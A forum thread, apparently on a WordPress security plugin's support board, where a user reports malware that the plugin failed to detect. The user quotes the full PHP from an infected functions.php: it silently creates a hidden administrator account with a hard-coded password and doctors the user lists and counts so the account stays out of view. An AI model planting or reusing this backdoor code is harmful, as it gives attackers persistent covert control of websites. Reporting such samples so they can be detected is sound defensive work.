Forum Replies Created
-
AuthorPosts
-
December 1, 2022 at 1:30 am in reply to: Reply To: Auto creation of malicious admin account not detected by plugin #85203
Your very welcome. Thank you for maintaining such as great tool to help fight against malware. I have been using your plugin for years.
November 29, 2022 at 2:02 pm in reply to: Auto creation of malicious admin account not detected by plugin #81808I just cleaned up a site and there were a few items missed by the plugin including the following devious admin account creation and hiding in the functions.php file –
function wpb_admin_account(){ $user = ‘wpadminas’; $pass = ‘OpF^MJrUK$SzYcOrfG’; $email = ‘email@email.em’; if ( !username_exists( $user ) && !email_exists( $email ) ) { $user_id = wp_create_user( $user, $pass, $email ); $user = new WP_User( $user_id ); $user->set_role( ‘administrator’ ); }}add_action(‘init’,'wpb_admin_account’);add_action(‘pre_user_query’,'yoursite_pre_user_query’);function yoursite_pre_user_query($user_search) { global $current_user; $username = $current_user->user_login; if ($username != ‘codepapa’) { global $wpdb; $user_search->query_where = str_replace(‘WHERE 1=1′, ”WHERE 1=1 AND {$wpdb->users}.user_login != ‘wpadminas’”,$user_search->query_where); }}add_filter(“views_users”, “dt_list_table_views”);function dt_list_table_views($views){ $users = count_users(); $admins_num = $users['avail_roles']['administrator'] – 1; $all_num = $users['total_users'] – 1; $class_adm = ( strpos($views['administrator'], ‘current’) === false ) ? “” : “current”; $class_all = ( strpos($views['all'], ‘current’) === false ) ? “” : “current”; $views['administrator'] = ‘<a href=”users.php?role=administrator” class=”‘ . $class_adm . ‘”>’ . translate_user_role(‘Administrator’) . ‘ <span class=”count”>(‘ . $admins_num . ‘)</span></a>’; $views['all'] = ‘<a href=”users.php” class=”‘ . $class_all . ‘”>’ . __(‘All’) . ‘ <span class=”count”>(‘ . $all_num . ‘)</span></a>’; return $views;}
-
AuthorPosts